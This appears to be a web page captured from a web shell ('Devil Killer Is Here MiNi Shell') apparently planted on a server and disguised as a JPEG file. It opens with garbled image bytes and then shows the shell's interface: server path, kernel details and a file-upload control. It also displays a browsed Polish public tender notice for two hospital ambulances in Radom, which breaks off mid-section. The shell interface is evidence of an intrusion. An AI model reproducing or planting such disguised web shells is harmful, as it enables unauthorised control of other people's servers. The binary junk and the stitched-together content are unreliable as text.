JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210413/0003154801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00031548 z dnia 2021-04-13</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup ambulansu transportowego z wyposażeniem dla Mazowieckiego Szpitala Specjalistycznego Spółka z ograniczoną odpowiedzialnością </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Mazowiecki Szpital Specjalistyczny Sp. o.o. w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670209356</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleksandrowicza 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-617</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@wss.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wss.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z ograniczoną odpowiedzialnością </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup ambulansu transportowego z wyposażeniem dla Mazowieckiego Szpitala Specjalistycznego Spółka z ograniczoną odpowiedzialnością </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5fed396-9c38-11eb-945c-72824b6a02d0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00031548</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004006/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa dwóch ambulansów transportowych </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mss.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu oudzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów luboświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacjielektronicznej poprzez platformę Marketplanet OnePlace. Wejście na platformę poprzez link:https://mss.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&MP_action=mainPage&clientName=mss</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji korzystania dla Wykonawców. Instrukcja jest udostępniona na platformie Marketplanet OnePlace.2. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia oferty lub wniosku oraz do komunikacji wynosi 100 MB. 3. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innychinformacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę Marketplanet OnePlace.4. W postępowaniu o udzielenie zamówienia ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 5. Sposób sporządzania oraz sposób przekazywania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniumusi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020, poz. 2452). 6. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zostały określone w Rozdziale XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zostały określone w Rozdziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.341.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 384709,60 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa 2 szt. ambulansów transportowych wraz zwyposażeniem szczegółowo określonych w załączniku nr 3 do SWZ. 2. Zaoferowany sprzętmedyczny musi spełniać wymagania oraz musi być dopuszczony do obrotu i używania zgodnie zustawą z dnia 20 maja 2010r. o wyrobach medycznych (Dz.U. z 2020r., poz. 186 z późn. zm.)3.Zaoferowane Ambulanse muszą spełniać warunki określone w Rozporządzeniu MinistraInfrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów orazzakresu ich niezbędnego wyposażenia (Dz. U. z 2016 poz. 2022) oraz wymagania określonerozporządzeniem Ministra Zdrowia z dnia 18 października 2010 r. w sprawie oznaczeniasystemu Państwowe Ratownictwo Medyczne oraz wymagań w zakresie umundurowaniaczłonków zespołów ratownictwa medycznego (Dz.U.2010.209.1382). 4. Zaoferowaneambulanse wraz ze sprzętem medycznym muszą spełniać wymagania norm PN EN1789+A1:2011 (w zakresie ambulansu min. typu A2) i PN EN 1865 - Pojazd fabrycznie nowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114121-3 - Karetki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Aktualne dokumenty potwierdzające, że oferowany sprzęt medyczny spełnia wymogi oraz jestdopuszczony do obrotu i do używania zgodnie z ustawą z dnia 20 maja 2010r. o wyrobachOgłoszenie nr 2021/BZP 00022394/01 z dnia 2021-03-242021-03-24 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawymedycznych (Dz. U. z 2020r., poz.186 z późn. zm.) a w szczególności:- spełniają tzw.wymagania zasadnicze, określone w rozporządzeniach, Ministra Zdrowia, uwzględniającymwymagania prawa wspólnotowego, w szczególności w zakresie projektowania, wytwarzania,opakowania i oznakowania tych wyrobów,- wystawiono dla nich deklarację zgodności, -oznakowano je znakiem zgodności CE.Wykonawca musi czytelnie oznakować wymienionedokumenty numerem pozycji danego wyrobu (np. Część 1 poz. „ 1”). b) Katalogi lub opisytechniczne w języku polskim potwierdzające wszystkie wymagane parametry techniczneprzedmiotu zamówienia określone w załączniku nr 3 do SWZ. (Wykonawca musi czytelnieoznakować w katalogach oferowane pozycje numerem pozycji danego wyrobu np. 1.).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przezZamawiającego, o których mowa w :a) art. 108 ust. 1 pkt 1 i 2 ustawy pzpb) art. 108 ust. 1 pkt 4 ustawypzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środkazapobiegawczego UWAGA W przypadku Wykonawców wspólnie ubiegających się o udzieleniezamówienia (w szczególności członkowie konsorcjum, wspólnicy spółki cywilnej) oświadczenie musizłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 2. oświadczeniaWykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupykapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U.z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia oprzynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymiprzygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.UWAGA W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wszczególności członkowie konsorcjum, wspólnicy spółki cywilnej) informację musi złożyć każdy zWykonawców wspólnie ubiegających się o udzielenie zamówienia. 3. odpisu lub informacji z KrajowegoRejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji; UWAGA W przypadku Wykonawcówwspólnie ubiegających się o udzielenie zamówienia (w szczególności członkowie konsorcjum,wspólnicy spółki cywilnej) odpis lub informa</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) Aktualne dokumenty potwierdzające, że oferowany sprzęt medyczny spełnia wymogi oraz jestdopuszczony do obrotu i do używania zgodnie z ustawą z dnia 20 maja 2010r. o wyrobachOgłoszenie nr 2021/BZP 00022394/01 z dnia 2021-03-242021-03-24 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawymedycznych (Dz. U. z 2020r., poz.186 z późn. zm.) a w szczególności:- spełniają tzw.wymagania zasadnicze, określone w rozporządzeniach, Ministra Zdrowia, uwzględniającymwymagania prawa wspólnotowego, w szczególności w zakresie projektowania, wytwarzania,opakowania i oznakowania tych wyrobów,- wystawiono dla nich deklarację zgodności, -oznakowano je znakiem zgodności CE.Wykonawca musi czytelnie oznakować wymienionedokumenty numerem pozycji danego wyrobu (np. Część 1 poz. „ 1”). b) Katalogi lub opisytechniczne w języku polskim potwierdzające wszystkie wymagane parametry techniczneprzedmiotu zamówienia określone w załączniku nr 3 do SWZ. (Wykonawca musi czytelnieoznakować w katalogach oferowane pozycje numerem pozycji danego wyrobu np. 1.). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) Aktualne dokumenty potwierdzające, że oferowany sprzęt medyczny spełnia wymogi oraz jestdopuszczony do obrotu i do używania zgodnie z ustawą z dnia 20 maja 2010r. o wyrobachmedycznych (Dz. U. z 2020r., poz.186 z późn. zm.) a w szczególności:- spełniają tzw.wymagania zasadnicze, określone w rozporządzeniach, Ministra Zdrowia, uwzględniającymwymagania prawa wspólnotowego, w szczególności w zakresie projektowania, wytwarzania,opakowania i oznakowania tych wyrobów,- wystawiono dla nich deklarację zgodności, -oznakowano je znakiem zgodności CE.Wykonawca musi czytelnie oznakować wymienionedokumenty numerem pozycji danego wyrobu (np. Część 1 poz. „ 1”). b) Katalogi lub opisytechniczne w języku polskim potwierdzające wszystkie wymagane parametry techniczneprzedmiotu zamówienia określone w załączniku nr 3 do SWZ. (Wykonawca musi czytelnieoznakować w katalogach oferowane pozycje numerem pozycji danego wyrobu np. 1.). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty wypełniony bezpośrednio na platformie zakupowej Marketplanet OnePlace.2. Oświadczenie Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy pzp - wzór oświadczeniao niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu stanowi Załączniknr 1 do SWZ. UWAGA: W przypadku wspólnego ubiegania się o zamówienie przezWykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp składa każdy zWykonawców. Oświadczenia te winny potwierdzać brak podstaw wykluczenia oraz spełnianiewarunków udziału w postępowaniu, w zakresie w jakim każdy z Wykonaców wykazuje spełnianiewarunków udziału w postępowaniu. 3. Wypełniony formularz cenowy - opis przedmiotuzamówienia sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 1 do umowy orazoświadczenie Wykonawcy dotyczące spełnienia parametrów technicznych przedmiotuzamówienia – szczegółowy opis przedmiotu zamówienia sporządzone wg wzoru stanowiącegoZałącznik nr 3 do SWZ. 4. Zamawiający nie wymaga złożenia oświadczenia o którym mowa wart. 125 ust. 1 ustawy pzp od podwykonawcy, iż nie podlega wykluczeniu z postępowania, jakrównież podmiotowych środków dowodowych dla podwykonawcy, któremu Wykonawcazamierza powierzyć wykonanie części przedmiotu zamówienia. Zamawiający żąda wskazaniaprzez Wykonawcę w Formularzu ofertowym dostępnym na platformie zakupowej:https://mss.ezamawiajacy.pl/, części zamówienia, których wykonanie zamierza powierzyćpodwykonawcom, oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani. 5. Wcelu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jegoreprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego RejestruSądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwegorejestru. UWAGA W przypadku Wykonawców wspólnie ubiegających się o udzieleniezamówienia (w szczególności członkowie konsorcjum, wspólnicy spółki cywilnej) odpis lubinformację musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzieleniezamówienia. 6. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa wustępie powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych iogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tychdokumentów. 7. W przypadku wskazania przez wykonawcę dostępności podmiotowych środkówdowodowych lub dokumentów, o których mowa w ust. 5, pod określonymi adresamiOgłoszenie nr 2021/BZP 00022394/01 z dnia 2021-03-242021-03-24 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawyinternetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający może żądać odwykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przezzamawiającego podmiotowych środków dowodowych lub dokumentów. 8. Jeżeli w imieniuWykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika zdokumentów, o których mowa w ust. 5, Zamawiający żąda od Wykonawcy pełnomocnictwa lubinnego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. 9. Wprzypadku oferty składanej przez Wykonawców, którzy wspólnie ubiegają się o udzieleniezamówienia (w szczególności członków konsorcjum oraz wspólników spółki cywilnej) (art. 58 ust.ust. 2 u.p.z.p.) – dokument potwierdzający ustanowienie pełnomocnika do reprezentowania w/wWykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy wsprawie zamówienia publicznego.Zamawiający dopuszcza złożenie umowy regulującejwspółpracę i zasady reprezentacji podmiotów występujących wspólnie w szczególności umowęspółki cywilnej jako dokumentu równoważnego z pełnomocnictwem.Dokument pełnomocnictwamusi zawierać minimalne postanowienia określone w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 2. W przypadku, o którymmowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniuo udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawiezamówienia publicznego. 3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio dowykonawców wspólnie ubiegających się o udzielenie zamówienia. 4. Wszelka korespondencjaprowadzona będzie wyłącznie z pełnomocnikiem. 5. Jeżeli została wybrana oferta Wykonawcówwspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciemumowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tychWykonawców. 6. Zamawiający nie zastrzega obowiązku osobistego wykonania przezposzczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowychzadań dotyczących: a) prac związanych z rozmieszczeniem i instalacją, w ramach zamówieniana dostawy. 7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp, składa każdy z Wykonawców.Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału wpostępowaniu w jakim każdy z Wykonaców wykazuje spełnianie warunków udziału wpostepowaniu. 8. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia ponosząsolidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian 